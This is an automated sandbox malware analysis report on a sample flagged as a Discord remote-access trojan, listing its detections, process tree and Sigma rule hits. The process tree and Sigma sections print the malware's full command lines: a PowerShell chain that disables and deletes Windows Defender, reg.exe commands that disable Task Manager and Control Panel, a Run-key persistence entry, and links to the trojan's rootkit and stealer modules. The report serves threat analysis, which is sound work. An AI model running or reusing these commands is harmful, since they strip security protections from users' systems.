Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bang_executor.exe

Overview

General Information

Sample name:bang_executor.exe
Analysis ID:1393035
MD5:043e699dbf3d88b6cca5fbe64229ba27
SHA1:50661d32315985eab2a70f1d1f6435b9563ca237
SHA256:2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
Tags:exe
Infos:

Detection

Dicrord Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Dicrord Rat
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Bypasses PowerShell execution policy
Contains functionality to disable the Task Manager (.Net Source)
Disable Task Manager(disabletaskmgr)
Disables Windows Defender (via service or powershell)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious PowerShell Parameter Substring
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • bang_executor.exe (PID: 2520 cmdline: C:\Users\user\Desktop\bang_executor.exe MD5: 043E699DBF3D88B6CCA5FBE64229BA27)
    • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bang_executor.exe (PID: 1236 cmdline: bang_executor.exe MD5: E1EAD094E52097B884389A8064B15E2B)
        • WerFault.exe (PID: 7948 cmdline: C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • executer.exe (PID: 2228 cmdline: executer.exe MD5: 88E22186F196CC0E1E2D500EEAC57337)
        • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7480 cmdline: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7552 cmdline: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7696 cmdline: powershell.exe -ep bypass .\test.ps1; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 8064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /K instaling.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7380 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 7500 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • bang_executor.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
            • WerFault.exe (PID: 7484 cmdline: C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /K mgr.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7392 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /K microsoft.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7440 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • bang_executor.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
          • WerFault.exe (PID: 7972 cmdline: C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • bang_executor.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeJoeSecurity_DicrordRatYara detected Dicrord RatJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_DicrordRatYara detected Dicrord RatJoe Security
      Process Memory Space: bang_executor.exe PID: 1236JoeSecurity_DicrordRatYara detected Dicrord RatJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.0.bang_executor.exe.230771e0000.0.unpackJoeSecurity_DicrordRatYara detected Dicrord RatJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: New RUN Key Pointing to Suspicious Folder
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\S
          Sigma detected: Powershell Defender Disable Scan Feature
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\S
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor
          Sigma detected: Direct Autorun Keys Modification
          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K microsoft.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7236, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, ProcessId: 7440, ProcessName: reg.exe
          Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K microsoft.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7236, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, ProcessId: 7440, ProcessName: reg.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\S
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dAvira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dllAvira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSteAvira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dllAvira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20graAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeReversingLabs: Detection: 47%
          Yara detected Dicrord Rat
          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: bang_executor.exeJoe Sandbox ML: detected
          Source: bang_executor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49729 version: TLS 1.2
